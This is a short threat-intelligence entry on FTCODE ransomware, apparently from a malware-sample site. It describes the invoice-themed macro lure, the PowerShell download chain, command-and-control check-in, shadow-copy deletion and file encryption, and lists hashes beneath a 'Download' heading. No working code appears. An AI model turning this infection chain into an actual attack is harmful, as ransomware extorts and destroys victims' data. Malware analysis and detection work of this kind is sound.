FTCODE Ransomware encrypts user data using AES-256 (in CBC mode) + RSA-1024, and then requires a ransom of $500 to return the files. FTCODE ransomware mainly target Italian companies. It is spreading via email spam campaign which previously know to distribute JasperLoader and Gootkit. It spread using an invoice-themed email that appears as a target for Italian users, attackers attempt to convince users to allow macros in a Word document.
The macro is used to run PowerShell to retrieve additional PowerShell code. This second PowerShell code, then, executes a GET request to a remote URL to obtain a Visual Basic file, which is similar to JasperLoader. Using JasperLoader as an installer, FTCODE starts preparing the environment by running checks to make sure the host is not already infected, generating a GUID and creating a unique password for the host. Some system information along with the GUID and password are sent to the attacker command and control server via a POST request. It also performs common ransomware functions, such as deleting backups and shadow copies. Finally, the files corresponding to a list of applicable extensions are encrypted. A ransom note is left on the system to provide payment instructions for file recovery.
FTCODE Ransomware Signatures
Family: TrojanDownloader:O97M/Obfuse.MX!MTB
MD5: a5af9f4b875be92a79085bb03c46fe5c
SHA256: b09bc9a25090cada55938367c7f12e692632afa2ed46d5e90eba29da84befafd
FTCODE Ransomware Download